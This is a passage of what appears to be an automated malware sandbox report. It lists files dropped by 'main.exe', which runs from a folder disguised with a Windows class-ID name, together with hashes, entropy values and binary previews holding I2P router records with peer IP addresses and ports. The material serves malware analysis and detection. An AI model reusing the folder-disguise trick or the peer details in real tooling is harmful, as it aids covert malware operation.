JnRqug65DTcqY~ohqfDnq39X1D6iHQXlOY4v6ljWGhk=;.mtu=.1500;.port=.22951;.s=,3nO9wEy6I7creLY7JfW4B0D8A3q-pI9bCEeIfeniGCA=;.v=.2;..-.caps=.PRE;.netId=.2;.router.version=.0.9.62;..unGM.....'XZN...A.D..".}.!.T..~..5......ixTN...O.^cW..W..t.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):868
Entropy (8bit):6.637628645863643
Encrypted:false
SSDEEP:12:70GvxQ555555555CWIVwm7XbNzzf5+CuaKK7LMI6JKgXb9DD:70g1VhjxDs1XbN
MD5:4924777E6288229B469900FE54B61F44
SHA1:BE4ECE0F1063DF10D5B5D69C5D3529E41658818F
SHA-256:70D0CF2D67C92C3854E76AB86A85AAC847009DE9BA7B904E0EAB521C8452DA6E
SHA-512:8497E1B24F2EA9977539E65CE94A2D09ED88C988C3868343E3C51A01923B1855EC0EE909736FA2145822D6D83C247C278356E668E20C7F1AAC0DA0F6DB15D3A5
Malicious:false
Preview:...a....Z.fyy.Gd...0(.!..^>TW=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.)..=.?.....!C.q.....Z.....q...............u...........NTCP2.x.host=.176.109.240.152;.i=.NBqZr22sJjYjE3R5tBrV-A==;.port=.23773;.s=,cVz-5PKO-6zmmnnUR8wMBkbhRTvY0QtLuZRQycNTdlw=;.v=.2;..........SSU2...caps=.BC;.host=.176.109.240.152;.i=,ZNn~qTujC4WTzXobKE3LA-a6SvdN4AmF5Ci9RIRwRjM=;.port=.23773;.s=,M0OinrapPa5TumO58ceQbibPTApVKbG7NkUYEeJJdyI=;.v=.2;..b.caps=.XfR;.netId=.2;.netdb.knownLeaseSets=.372;.netdb.knownRouters=.6441;.router.version=.0.9.62;zV!......f.....it.X.oG....]qi?6..5...X.=K..aTH$O.e$...Z.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):810
Entropy (8bit):6.658357060992697
Encrypted:false
SSDEEP:24:VsxHHHHHHHHHZPB7hBzSdUx0Yn7hzIxgf:VsXP5hBzyUmShzIU
MD5:45A9098D458B697D9AA5D5141C1269DE
SHA1:67609865BFAEEE2FB4A474F8718629EB9B89B827
SHA-256:C328CD7C05519BF8ED7C66529F06D106A207261F738C1A914488EC673B04FD27
SHA-512:B93A6511E7F876BAA17AD8D5CA1842DD5739A55AA09CBE6EA79787C7E3D832E37148E53869E881CF3F2B306F5B0805AFA46266C6DA48771EED38AA821D1C8AD5
Malicious:false
Preview:bG].`....O..p.....'...#2.:.A.NY5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../.x.4....5...h.&<.o[...}%..7+.............$.[Z...........NTCP2.v.host=.106.68.22.241;.i=.tZBuHKwwgvFvLZWo-MvT5A==;.port=.26891;.s=,RuEHGnB6PXFSTNJMpPrHMtjU7yw2Li2ijiZoHidSJww=;.v=.2;..........SSU2...caps=.BC;.host=.106.68.22.241;.i=,vHfDo5tf6LS6Gyf2uRWsQOiQnJlui6-dUqzH76Cs-OU=;.port=.26891;.s=,WhJN-2~40wUXhG-TcVLrXQiceif28eod-FSNEvTYPRc=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;f...N.~...<4,`.......m.;.5.v....2......3.........a.$.v....
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1297
Entropy (8bit):6.64516431793234
Encrypted:false
SSDEEP:24:UPsyQ9syQ9syQ9syQ9syQ9syQ9syQ9syQ9syQ9syEAjvnOvvMaTRip5auR7RgQ8j:UUyryryryryryryryryryE6nOvTRUMua
MD5:1B8A13E58E5CD0660B416885AB50063B
SHA1:EFF004BD92515C40FB07F181E105A087D5512B7F
SHA-256:12A0F9C4F0375235F185C6C63E4D15602DD2E2A259A061546690943C235B5F50
SHA-512:360A437D993A3E64E4E23A4E9FBFA30F846CBD0EBCB09B063F30F20CCEEC4C20FF96074650E45C7C7D76258591C42BFA9BE862E3CD5984D23F50B09BFBC11306
Malicious:false
Preview:.....^.x'=)x..o............-I!.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.._. zEP.O...i..-..|..f#.w...5.P..............%Z...........NTCP2.v.host=.85.239.63.250;.i=.cy2s4cu-Y0fStBFY9nKPtg==;.port=.26748;.s=,oQNBjSNoLi9zVeJysllXGyiSyYdZuZFm4lwZ~5swGW8=;.v=.2;..........NTCP2...host=.2a10:1fc0:7::5698:76d4;.i=.cy2s4cu-Y0fStBFY9nKPtg==;.port=.26748;.s=,oQNBjSNoLi9zVeJysllXGyiSyYdZuZFm4lwZ~5swGW8=;.v=.2;..........SSU2...caps=.BC;.host=.85.239.63.250;.i=,DfFr01751yPzLNoSs6lYshXwYZ96FCIDkc~BjNYgM9U=;.port=.26748;.s=,TOODjw4j7qo4Rs696OjVZOimotWrjqkYSj9I7Y6AKCc=;.v=.2;..........SSU2...caps=.BC;.host=.2a10:1fc0:7::5698:76d4;.i=,DfFr01751yPzLNoSs6lYshXwYZ96FCIDkc~BjNYgM9U=;.mtu=.1500;.port=.26748;.s=,TOODjw4j7qo4Rs696OjVZOim
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1352
Entropy (8bit):6.682953588479811
Encrypted:false
SSDEEP:24:kcCeUQhme/rhmdgBidulE4JUczCX6jP5Fs65:jNPhBWAlgmCX6865
MD5:A2677282FDFADB271F6C58DA1CE2D279
SHA1:DA836848A5A72EFA514C514DF684038E5C22AC4A
SHA-256:A8FB9E6572C8A3F66FFD5B7D45F9EBAD13EF0754670F10E1B4F7BE0BF0EF871C
SHA-512:185CBBA7ADC761199392153B4B3C4AF9813696951963B4B7A7312517000882785655B03E324D89174471CB9603AB92E22B1BD2CE5EEA60CF05599606279B04AD
Malicious:false
Preview:M..`.l...(......L[U....p["q...U.nx.b|...b..5+.".=....i..D....U.nx.b|...b..5+.".=....i..D....U.nx.b|...b..5+.".=....i..D....U.nx.b|...b..5+.".=....i..D....U.nx.b|...b..5+.".=....i..D....U.nx.b|...b..5+.".=....i..D....U.nx.b|...b..5+.".=....i..D....U.nx.b|...b..5+.".=....i..D....U.nx.b|...b..5+.".=....i..D....U.nx.b|...b..5+.".=....i..D...<8P....<.(.t.%y.F..39...l.RI>0Z.............N_...........NTCP2.v.host=.99.252.228.84;.i=.fVw85r-jzxdDEzEQnxG0kw==;.port=.23131;.s=,aeWngId4mIaElzXT1gj5N-7InC9pWxdU~8WG16Jw-Rk=;.v=.2;..........NTCP2.@.caps=.6;.s=,aeWngId4mIaElzXT1gj5N-7InC9pWxdU~8WG16Jw-Rk=;.v=.2;..........SSU2...caps=.BC;.host=.99.252.228.84;.i=,Gc~uYUvsmHU-qNI5SHVb7VeGi7zIfUDTfD3RsA53Idk=;.port=.23131;.s=,S71ZCFhntkRibiARSEPqqikoRfbCkV0VmW9HCyFgc1M=;.v=.2;..........SSU2...caps=.6;.i=,Gc~uYUvsmHU-qNI5SHVb7VeGi7zIfUDTfD3RsA53Idk=;.iexp0=.1726479861;.iexp1=.1726479867;.iexp2=.1726479886;.ih0=,o~XhUYyr2AsRYAutyWCuPl5iCgW65zMsoKiiAoyY7nM=;.ih1=,FacMecKxFZneIfI1~F80HTO87BjFZ5gh
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1138
Entropy (8bit):6.7208360308563995
Encrypted:false
SSDEEP:12:heAIHdIHdIHdIHdIHdIHdIHdIHdIHdIGMBNPVSW7YcPVSW7YBSOL/4sDB/L/4sU0:hL888888888ZMBNqcqBSOr4Sr49z2
MD5:CFB3D05F1B97DD1F7597E92BD10BF2C2
SHA1:C970C2F98BF87327E8B3789CDB0A207E2E8BAE1E
SHA-256:4193A779F80B09A4E72AEB14D29D1EAD09819BF44A7F1A4A7F355EF4C22B8F13
SHA-512:3FC222035B3FF896B44CA9D8AD4430E7E459B3B866AB0746DB6FA5603D0CA7EEB111EDE51D9391E1FC5BFF0A6717BCB5F9DFAE861FAD1C920CA2847D8A4A45D9
Malicious:false
Preview:...... ...K.A..........7...K..v..>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m..5.7..5;e..B..Y...).u.,J.y...|...............A=...........NTCP2.w.host=.135.181.40.188;.i=.D8W8tvdexrzUIwJFuNzrFg==;.port=.13568;.s=,wm1ZKSVEc8xuRXNZtu~VzO0mEjDLYRQEERsa4fPoPmw=;.v=.2;..........NTCP2.~.host=.2a01:4f9:c012:189f::1;.i=.D8W8tvdexrzUIwJFuNzrFg==;.port=.13568;.s=,wm1ZKSVEc8xuRXNZtu~VzO0mEjDLYRQEERsa4fPoPmw=;.v=.2;..........SSU2...caps=.BC;.host=.135.181.40.188;.i=,G1I3PmKzGhsk15ImwfzfS4BsMwgg7-v1i0tbm9p55-4=;.port=.13568;.s=,B2lG3qKNHdWciqVlQHU9bvCRv-5adp-OtDnetykyn1A=;.v=.2;..........SSU2...caps=.BC;.host=.2a01:4f9:c012:189f::1;.i=,G1I3PmKzGhsk15ImwfzfS4BsMwgg7-v1i0tbm9p55-4=;.mtu=.1500;.port=.13568;.s=,B2lG3qKNHdWciqVlQHU9bvCR
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1132
Entropy (8bit):6.715903076035755
Encrypted:false
SSDEEP:24:IqCqLqLqLqLqLqLqLqLqLMq+9EIE29QK/QNQVQh8p:IqOt977yKDVQhA
MD5:6BCE5E57916C95C96DAF6E3B257770BC
SHA1:3BC4BC5A2F5D955094D063A27C3A1088385F6E7D
SHA-256:51CAC14DAD448446678B9997AA5CA8244B4150882405A2185EC9C8CE049384FC
SHA-512:B9AC0BC5D76C30E3052796EA4F5862A28A30E87BD2384B5873878B7B859621DA1C50B98B719E9EAD64BD3B3FA9B2E6EBE68A9AFA48413C66CF65626EE8281BA5
Malicious:false
Preview:..w...v.$dQ...P.a.?....bX..S.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.y...lU.I.c..".....\.4..W'kQ.............@&...........NTCP2.u.host=.5.104.75.170;.i=.iBxH3VNQ9vmDrQdCVWE~LA==;.port=.12345;.s=,DzaRVP212EJ1~RTM0-Aeg7c6jRIZ6HtyXydmf9wqKTM=;.v=.2;..........NTCP2.}.host=.2a0f:cdc6:500:5d7::2;.i=.iBxH3VNQ9vmDrQdCVWE~LA==;.port=.12345;.s=,DzaRVP212EJ1~RTM0-Aeg7c6jRIZ6HtyXydmf9wqKTM=;.v=.2;..........SSU2...caps=.BC;.host=.5.104.75.170;.i=,L2DCH0rx2Cfsyqy~H6nGP3wMajb23l3cLngRaAngAgo=;.port=.12345;.s=,Yk04nw8srgK4u8h1rqW1vdlhaZOVo4Sf~WTwg5u6vTo=;.v=.2;..........SSU2...caps=.BC;.host=.2a0f:cdc6:500:5d7::2;.i=,L2DCH0rx2Cfsyqy~H6nGP3wMajb23l3cLngRaAngAgo=;.mtu=.1500;.port=.12345;.s=,Yk04nw8srgK4u8h1rqW1vdlhaZOVo4
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1353
Entropy (8bit):6.674550977947205
Encrypted:false
SSDEEP:24:TX1pgGpgGpgGpgGpgGpgGpgGpgGpgGpzX6vtOoghY6hYO8KIpbHbs2gKCBMtI:TTgqgqgqgqgqgqgqgqgqziHkpIKGQ2g1
MD5:66517FC4EC771984B6105AF4258D6F9B
SHA1:7CE5DED2073E176F6F5A562021C1EEA3BF159C6E
SHA-256:81A33E94A5FDBDFF624D7F1130689C4D4F520A0A65B7E2D1B37FB4BB228A8166
SHA-512:8DDFA8E4882196F0831D4E76A61EA7DFCD472D4E700F10854CCBEE6BAE9906F350258F431FB7C26889088BE58CC3FE7178B0BCF49F7539B2339DBC71F82D6882
Malicious:false
Preview:r.@...A..<....z......'j .n..^.J|...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+g......TYn.K.....w>|.....O{..:a.........................NTCP2.w.host=.184.65.173.183;.i=.LhJaOvR98fYEkUoc3KXBlQ==;.port=.11171;.s=,3TAI5XG87ozsQmFHH6YsEfoeYWumeQSwiPSQUEizQEY=;.v=.2;..........NTCP2.@.caps=.6;.s=,3TAI5XG87ozsQmFHH6YsEfoeYWumeQSwiPSQUEizQEY=;.v=.2;..........SSU2...caps=.BC;.host=.184.65.173.183;.i=,L1NDJeQrknxi0IjUM-swDuY2ognl3I~ORS~193r~N3k=;.port=.11171;.s=,7YoYxjX3Ve9MFUJZ9Gb8gk-XzOs0XCBt5TMEg5M30zk=;.v=.2;..........SSU2...caps=.6;.i=,L1NDJeQrknxi0IjUM-swDuY2ognl3I~ORS~193r~N3k=;.iexp0=.1726479938;.iexp1=.1726479962;.iexp2=.1726480323;.ih0=,AHoMVrW9Aed3q2yKryB0DIFBpMi9vYzq61l4AdBgK5A=;.ih1=,u6yHZa5jb5ibt3RTMcrT~KjYoYDwd2
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):806
Entropy (8bit):6.721429773603015
Encrypted:false
SSDEEP:12:2emAEOEOEOEOEOEOEOEOEOEKa8ViNOqu3883Ao3tKZQXDjZ91vqpNEAZlgoR:5Jzzzzzzzzzha8ENO/ddoQZ91yjhlvR
MD5:B8033BC39732AE524262BF55322CD817
SHA1:FB66EE28BE4882295BF99ECCFE4C053D78FBE93E
SHA-256:3F0783B3F9685CF225AAFE2854AE4B0ED0AF43C6055A9E35CA347CE9E17B17F1
SHA-512:AB2A076CC3AC5DC0002D975DF22E621064E39B7DE7944BB4F77110EE1CCB17697B1EEA564A93205095ED5C7B78758A21A228B59BF67F76D07641D5F43ECA6F7E
Malicious:false
Preview:C{..u|..='."...%....7..k..G.B3.z..GT*.9yz0.cR.!.LM....1@J...z..GT*.9yz0.cR.!.LM....1@J...z..GT*.9yz0.cR.!.LM....1@J...z..GT*.9yz0.cR.!.LM....1@J...z..GT*.9yz0.cR.!.LM....1@J...z..GT*.9yz0.cR.!.LM....1@J...z..GT*.9yz0.cR.!.LM....1@J...z..GT*.9yz0.cR.!.LM....1@J...z..GT*.9yz0.cR.!.LM....1@J...z..GT*.9yz0.cR.!.LM....1@J...^.n/...[...'y!../...g<...y..U...........................NTCP2.t.host=.78.47.80.55;.i=.6G21pOZeregZESgqJXMuAQ==;.port=.12207;.s=,K5Jvyx1XN8vp8RcbmTeZ2mEmJ5n6nkkuQPEMD5MQZTI=;.v=.2;..........SSU2...caps=.BC;.host=.78.47.80.55;.i=,MyaavxCRxl7NHLUYiZ1MOT-VfKX~VwoRRDq4BHoK6fU=;.port=.12207;.s=,9cOvSQiKl~0A7UgjjCZfRlj1YDH6jkASKq0m9nUDBFg=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.62;i.$.p.....E{6.O....r_7k.t.Q.s..T....r...;>..p....w%\.B.;...
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):987
Entropy (8bit):6.683040065118697
Encrypted:false
SSDEEP:24:kPRwV3wV3wV3wV3wV3wV3wV3wV3wV3wVC/mBqZIUGVJl7QWLV/hKzcz8wpG:mQQQQQQQQQj/lSUGJ5HVpG
MD5:273A3A6F7385E6B6525249E231BBE8FE
SHA1:D6E99A49835441B786F8CD01F1BBDE33C0F60622
SHA-256:F97ACAFFF0C3A910CE119D3EFD856D7C4CA7FCEA65A8B95704B6D802EA6A32D9
SHA-512:C8CBC3D374A8217058AD7F59A31B49E3150EE892E62C36C94249B253CD0AAFD82E8647F1DF1D69145193D4179A6EE709304F9A926ABB6E3AD0CFB690E8243749
Malicious:false
Preview:....W.F......_|.n;R.3>.oqD_...=........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.&H_..<h6.-..Dr\..u.u......Df..G.............}............NTCP2.@.caps=.4;.s=,0sSIHxFIU69kl-HkV2H3IyfPc~sb7wdwc03NKWp2NkU=;.v=.2;..........SSU2.{.caps=.4;.i=,fQoJqr25rGBpXlZl6GKmt9XF0XNxwm2RuNOwks73XFM=;.iexp0=.1726475058;.iexp1=.1726476231;.iexp2=.1726477010;.ih0=,rl262weNed7MoXbL3qK8kOH2XR5DVO1ng4-vaCFOxeE=;.ih1=,oyOvQwZmAsqFKF7YxnwBioSflGDg8PnSnFyyaurjg60=;.ih2=,0EsnMziHI~fHyUsa0DO2TiVkhEnhmnX1igcl27-nstg=;.itag0=.3159109689;.itag1=.193068267;.itag2=.1610619978;.s=,ajekH9Iwyr921Wj~G2bsiA8t7BxoHwfBeimG4pFEE1o=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.63;.*.o;K...b..T.~8......+.+o.O@.....@nH.6.......t.r.....^.<b9...
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):812
Entropy (8bit):6.749711073623528
Encrypted:false
SSDEEP:24:lwpagagagagagagagagagberxOqL6waxvjQA:liPPPPPPPPPO2jH
MD5:20F7A142F5B3AE6883FA0E27BE68BEF7
SHA1:63BC44B15F7ADFFCFBDB033B8188D8CE98FBD77A
SHA-256:48E83B770CB89049CF0A4CDBC9B14434215190F14CC0C8EFADAD4AB5B4A1172E
SHA-512:AE0051AFED0B92819346E02CCF7881252849369665D5D66252B2FC0FE431C2089FAC512DB8AAE0DDAE091433689E5B57B2480C0A535236D088FF8DADA125F000
Malicious:false
Preview:..9bD.....h._.0.<....r..h..HE!5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....aVh;d.V..j"..h.#...B{.T.ssr.^............................NTCP2.w.host=.89.219.212.160;.i=.o1gOrMLP-K2VEwc-G-9RNQ==;.port=.15363;.s=,zdo68vbPFv-1MhRM1IxZg1ExFxhpRAQW5rL7Xg6PFk0=;.v=.2;..........SSU2...caps=.BC;.host=.89.219.212.160;.i=,gbbt34cCSqSI8kI6E-gSEiyrDhaLboEC0G-UZVjZo64=;.port=.15363;.s=,3EsxVmEuJdwLAIRW~HYXHJeSZ0--4R8m1eDu1HnA8E0=;.v=.2;..,.caps=.PR;.netId=.2;.router.version=.0.9.57;.|...k@..8uo....W...f}p@*.>......E.|..o.FyJ.......<...Q..%o.....
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):1403
Entropy (8bit):6.651850631353088
Encrypted:false
SSDEEP:24:+CmdxlLCmLPwqGwxjTfAR6/uPMaKxgP2aIc6RD:+CmhCmLPwOe6YPYc6J
MD5:EA3BBF9011CB33D446A71091B1EDFEA5
SHA1:15ECEC0E53E3823BECF41F12EA95B188E6CCDAE8
SHA-256:0582690E830F600C6E071F43E25909209CBF8865145FE41A76D50B4BFA7B4674
SHA-512:B32D315581E3E0A4A5492696AF9E62E57F05A90C283FDF091A7E9C0134C48A19ED9F541658905352A69EB77016D8A6996AC68E34203A8CAFA36E8D95BF72C716
Malicious:false
Preview:...(.,.HjT0..p.J;d.....A.T.d...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m.....f...!....iaG:X.\.&.M.....].~.............xa...........NTCP2.@.caps=.4;.s=,X2GkU2KjzLst1ZTylXPMKxRc60GEjgSEgegCVSCIoUA=;.v=.2;..........NTCP2...host=&2404:c807:7c0:1500:9852:2e35:138d:9662;.i=.rVEebX~I~lkHgKc322aqjw==;.port=.28724;.s=,X2GkU2KjzLst1ZTylXPMKxRc60GEjgSEgegCVSCIoUA=;.v=.2;..........SSU2.|.caps=.4;.i=,x6xZynMjto1lvzDALrLmoGmNR4coPlq4tAPFRRJrdw8=;.iexp0=.1726471724;.iexp1=.1726473653;.iexp2=.1726475174;.ih0=,ADIc1paVmlrAEnqXSHcGy~Rk0dBGcraxRN~6ndNnuCw=;.ih1=,Um4yMok-Ea75a1ZKS32xN3XWaRk4fIejMgqZP-eHtZw=;.ih2=,4Xp7utZS2gUdQ72CEdeSEWpspZFzvountiIxeKs4hxU=;.itag0=.3439885065;.itag1=.1823521675;.itag2=.2632674442;.s=,2Smyr91N95m65r
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1143
Entropy (8bit):6.74205932349655
Encrypted:false
SSDEEP:12:m/wRaPRaPRaPRaPRaPRaPRaPRaPRaPRv6mm9JB4E0zts9bpJB4E0ztseAWEWMXJM:IsUUUUUUUUUvPmDmE0OFnmE0ODWEZ+r3
MD5:B956DB84BF918CA1E6EF70A8616EEAE0
SHA1:AF03FB5F106CE60CF42396CDE79CC94CBC5ACB93
SHA-256:5D2382CB458197C31C6BECD8724CCEB5DCBF446F80A56210406A405FB100D8AA
SHA-512:CD08FF41AB925ED07A029A606A2D59D227C408C2F82931A75EBC4E5A516AEC95E1E52EE38DEB128D3351B2E3E5CE09A3C42FA2BA58B9A656E1CA2D118A64857E
Malicious:false
Preview:55..ln.F.)&.R...K..6.1{*..H.9d].R.....Be..*.....y`ol/<...+..d].R.....Be..*.....y`ol/<...+..d].R.....Be..*.....y`ol/<...+..d].R.....Be..*.....y`ol/<...+..d].R.....Be..*.....y`ol/<...+..d].R.....Be..*.....y`ol/<...+..d].R.....Be..*.....y`ol/<...+..d].R.....Be..*.....y`ol/<...+..d].R.....Be..*.....y`ol/<...+..d].R.....Be..*.....y`ol/<...+...J.w%.H..me.o.j2...2.R..%{.G.-...........................NTCP2.v.host=.185.207.205.7;.i=.p8jmAPikpNttJg-rRIhIrw==;.port=.54463;.s=,yE9ZGkyvUH0I0DqjI4KgP2XxYEZwoeQn05REBorNxgc=;.v=.2;..........NTCP2...host=.2607:7700:0:53::b9cf:cd07;.i=.p8jmAPikpNttJg-rRIhIrw==;.port=.54463;.s=,yE9ZGkyvUH0I0DqjI4KgP2XxYEZwoeQn05REBorNxgc=;.v=.2;..........SSU2...caps=.C;.host=.185.207.205.7;.i=,QQPjFGwGaRPxCQF8Vxd~sOG7YNql2jv3UPo3PHmEhDM=;.port=.54463;.s=,O-bmYKbP-8ZqoeHI~D4ht-hEBgm~8KYH7zHHETqzM2w=;.v=.2;..........SSU2...caps=.BC;.host=.2607:7700:0:53::b9cf:cd07;.i=,QQPjFGwGaRPxCQF8Vxd~sOG7YNql2jv3UPo3PHmEhDM=;.mtu=.1280;.port=.54463;.s=,O-bmYKbP-8ZqoeHI~D4
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1249
Entropy (8bit):6.645863156841049
Encrypted:false
SSDEEP:24:13nsDsDsDsDsDsDsDsDsDsSBrnBR/JL64pR/I3vQMd8r:1ornBOt3vPd8r
MD5:86847AAFDF1FEC720EBF9FC9006075C7
SHA1:462D4FA201DEC2CD36F275F3510CBB739510BA25
SHA-256:5CE7A10743B1ACF408EE07FD74B90E93160EA08991A380EF5BFF5C8B96A76587
SHA-512:4B46268EDB06EF7011B0B62B1119EC213E28A1E87A93E4975019A4626F35BA8FC06566AAB1A9BC6F4C5C97362AC415E8EFF2278911138230D5D0D287D1D6678E
Malicious:false
Preview:.<k]...f..+-qT....V>z....>'~.a.k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t.$.e..:...A....Q&...A).;.S..............................NTCP2.@.caps=.4;.s=,WVX5S0JsoDlT4bofcd-388nkIQ4fG0C15SWx6wp98V0=;.v=.2;..........NTCP2.@.caps=.6;.s=,WVX5S0JsoDlT4bofcd-388nkIQ4fG0C15SWx6wp98V0=;.v=.2;..........SSU2.|.caps=.4;.i=,gXogL1WJsvEeIKumwWZsMqoHIXwff3ZQLNf1XmbK7cQ=;.iexp0=.1726477744;.iexp1=.1726477744;.iexp2=.1726477762;.ih0=,GIEXCb9OkV3aTUpTW1GKBMR5M0uY73Yffw5zi4IE9~A=;.ih1=,zJ03fyYlcJa5a3ae4pcro2qrM07jtiDWbK-bUk0ZNI0=;.ih2=,i6D9HJK4Euvki6CGwPuC40fy~~E6VXGECSeSkbvYUUU=;.itag0=.1918973599;.itag1=.1940862708;.itag2=.3608931834;.s=,b9JmssyhXCYGBXzTYHFm0bHl02cGZMGSQDpiTvunBE8=;.v=.2;..........SSU2.q.caps=.6;.i=,gXogL1WJsvEeI
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1355
Entropy (8bit):6.731674501966078
Encrypted:false
SSDEEP:24:9MDEEEEEEEEvHObwncKbX7cKbX21ivYjb6Vrc6acuYFTEdsBjA:9MDHObwcKbQKbG1ivYjb6Vg6aPYC6BM
MD5:3760A43766F076591CAAD29A98DE42EE
SHA1:096C57E48C14230198FFCF0799D2F93F99874AFC
SHA-256:1AAF6FEC2887992CEBD453EDA20C4C5A14D0B5CDF0899D2A6A62358E3C748DAB
SHA-512:E78A6D254395C1E261D7EF84418A039B824ED6817B89BDB5675A925E8D244BECD29C3BBB4BCF73CAD331967F9F226852791FAA038676EF90FF17153687684882
Malicious:false
Preview:..?I\......8$.W.'Q0p>....'.U..V"....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C..J....p........x{'...9.... 